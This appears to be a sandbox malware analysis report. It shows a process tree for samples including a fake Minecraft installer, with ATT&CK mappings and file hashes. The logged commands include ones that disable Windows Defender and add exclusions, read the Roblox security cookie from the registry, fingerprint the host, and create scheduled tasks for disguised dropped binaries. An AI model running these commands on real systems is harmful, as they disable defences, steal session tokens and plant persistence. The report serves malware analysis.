C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gnhqkya2\gnhqkya2.cmdline"6⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF637.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCA72995458D514213A337DC9C621D8484.TMP"7⤵PID:984
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\az3e1igp\az3e1igp.cmdline"6⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF6E3.tmp" "c:\Windows\System32\CSC6CCDE66B4B8D4942B78F91C89C8EB53.TMP"7⤵PID:4144
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\dwm.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\TextInputHost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3292
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\it-IT\spoolsv.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4276
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Pictures\fontdrvhost.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\Lang\msedge.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Discord\Updater.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4136
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Y5VhvajCCX.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:4224 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:5240
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- Runs ping.exe
PID:5360
-
-
C:\Recovery\WindowsRE\TextInputHost.exe"C:\Recovery\WindowsRE\TextInputHost.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SlasherTeam.exe"C:\Users\Admin\AppData\Local\Temp\SlasherTeam.exe"2⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3204
-
-
C:\Users\Admin\AppData\Local\Temp\Minecraft 1.16.5.exe"C:\Users\Admin\AppData\Local\Temp\Minecraft 1.16.5.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Minecraft 1.16.5.exe"3⤵
- Views/modifies file attributes
PID:3488
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Minecraft 1.16.5.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious use of AdjustPrivilegeToken
PID:2376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5392
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5800
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5900
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:5964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵PID:6060
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:4820
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Minecraft 1.16.5.exe" && pause3⤵PID:3984
-
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:5312
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1492
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwmd" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\dwm.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3044
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3132
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4328
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3640
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Internet Explorer\it-IT\spoolsv.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\it-IT\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1276
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Program Files\Internet Explorer\it-IT\spoolsv.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3200
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Pictures\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\Default\Pictures\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4984
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Pictures\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1324
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 12 /tr "'C:\Program Files\7-Zip\Lang\msedge.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1332
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5104
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "msedgem" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\msedge.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:216
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "UpdaterU" /sc MINUTE /mo 11 /tr "'C:\Users\Admin\AppData\Roaming\Discord\Updater.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:224
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Updater" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Roaming\Discord\Updater.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "UpdaterU" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\AppData\Roaming\Discord\Updater.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4340,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4588 /prefetch:81⤵
- Executes dropped EXE
PID:2136
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5940
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5380
-
C:\Windows\System32\jpzkqk.exe"C:\Windows\System32\jpzkqk.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:228 -
C:\Recovery\WindowsRE\dwm.exe"C:\Recovery\WindowsRE\dwm.exe"2⤵
- Executes dropped EXE
PID:5136
-
-
C:\windows\system32\jpzkqk.exe.exe"C:\windows\system32\jpzkqk.exe.exe"2⤵PID:1168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5012 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb67eab58,0x7ffcb67eab68,0x7ffcb67eab782⤵PID:2992
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:22⤵PID:5900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:82⤵PID:2800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2288 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:82⤵PID:2464
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2868 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:12⤵PID:5324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2880 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:12⤵PID:5788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4340 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:12⤵PID:6100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:82⤵PID:5916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:82⤵PID:5184
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4636 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:82⤵PID:3616
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1588 --field-trial-handle=1804,i,8796276730531189581,15361862830589330367,131072 /prefetch:22⤵PID:2960
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:4436
-
C:\Users\Admin\AppData\Local\Temp\SlasherTeam.exe"C:\Users\Admin\AppData\Local\Temp\SlasherTeam.exe"1⤵
- Executes dropped EXE
PID:380
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3244,i,17096020621006928097,15544233752327415349,262144 --variations-seed-version --mojo-platform-channel-handle=4352 /prefetch:81⤵
- Executes dropped EXE
PID:2204
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\SlasherTeam.exe"1⤵PID:3832
-
C:\Users\Default\Pictures\fontdrvhost.exeC:\Users\Default\Pictures\fontdrvhost.exe1⤵
- Executes dropped EXE
PID:5068
-
C:\Program Files\7-Zip\Lang\msedge.exe"C:\Program Files\7-Zip\Lang\msedge.exe"1⤵
- Executes dropped EXE
PID:1088
-
C:\Users\Admin\AppData\Roaming\Discord\Updater.exeC:\Users\Admin\AppData\Roaming\Discord\Updater.exe1⤵
- Executes dropped EXE
PID:1888
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
PID:5968
-
C:\Recovery\WindowsRE\dwm.exeC:\Recovery\WindowsRE\dwm.exe1⤵
- Executes dropped EXE
PID:2316
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3888 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcb67eab58,0x7ffcb67eab68,0x7ffcb67eab782⤵PID:4264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1760 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:22⤵PID:1528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:1360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:4352
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:12⤵PID:5444
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3112 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:12⤵PID:3144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4332 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:12⤵PID:228
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4488 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:4508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4500 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:5372
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4652 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:1848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:872
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4800 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:82⤵PID:5788
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1888 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:22⤵PID:5412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4812 --field-trial-handle=1936,i,351085561189876263,4822846942174506810,131072 /prefetch:12⤵PID:2988
-
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵PID:5784
-
C:\Recovery\WindowsRE\TextInputHost.exeC:\Recovery\WindowsRE\TextInputHost.exe1⤵
- Executes dropped EXE
PID:2212
-
C:\Program Files\Internet Explorer\it-IT\spoolsv.exe"C:\Program Files\Internet Explorer\it-IT\spoolsv.exe"1⤵
- Executes dropped EXE
PID:3604
-
C:\Users\Default\Pictures\fontdrvhost.exeC:\Users\Default\Pictures\fontdrvhost.exe1⤵
- Executes dropped EXE
PID:5704
-
C:\Program Files\7-Zip\Lang\msedge.exe"C:\Program Files\7-Zip\Lang\msedge.exe"1⤵
- Executes dropped EXE
PID:4932
-
C:\Users\Admin\AppData\Roaming\Discord\Updater.exeC:\Users\Admin\AppData\Roaming\Discord\Updater.exe1⤵
- Executes dropped EXE
PID:2388
-
C:\Recovery\WindowsRE\dwm.exeC:\Recovery\WindowsRE\dwm.exe1⤵
- Executes dropped EXE
PID:2248
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4KB
MD5ad4537c405e64e5a7f2574d073dcdefb
SHA1ce7db9b1e6ed28fd36ace6004dcc5f47929fc8df
SHA25622fbd7ba3b1bedfafa955f57574301a08c6371869ee92be043132390d4f4b92a
SHA512f164819460d763ad327fc0d0661bd09d0d65330a5757df7dd7332828d4ff6b93cb3e44306c7b622c4e5ed403c7ba1fe5c63814b78bb19d9053b9d2eb97c2b66e
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
40B
MD5e646991f9b7863013f4543e5deea2d49
SHA17d3ab1c249b15c5bc5761baef819fa96b043539a
SHA2560cc277125b5bd55a7c42e32f351b5bce3ca6003f28bc0646db5bc6b9b5135c07
SHA5128b7b264f086ee2d1c1ec1199307d6511ce964890e84312a1c12c21a0a1fac24d6bf005a2ded820ecae3b51b58229a8ce724e98e40b03e1f93d3914948025a76f
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\33e81afc-bd51-4373-90a2-c9302902082c.tmp
Filesize16KB
MD591c5df1209719419567d2c6558349870
SHA17a24c13f7a39ff9d5bff3362aebd4ffa071a306c
SHA25601a072c75f71176560f6781ac39c6530190f9d48248f5dbfeba5f6dd51e1df2d
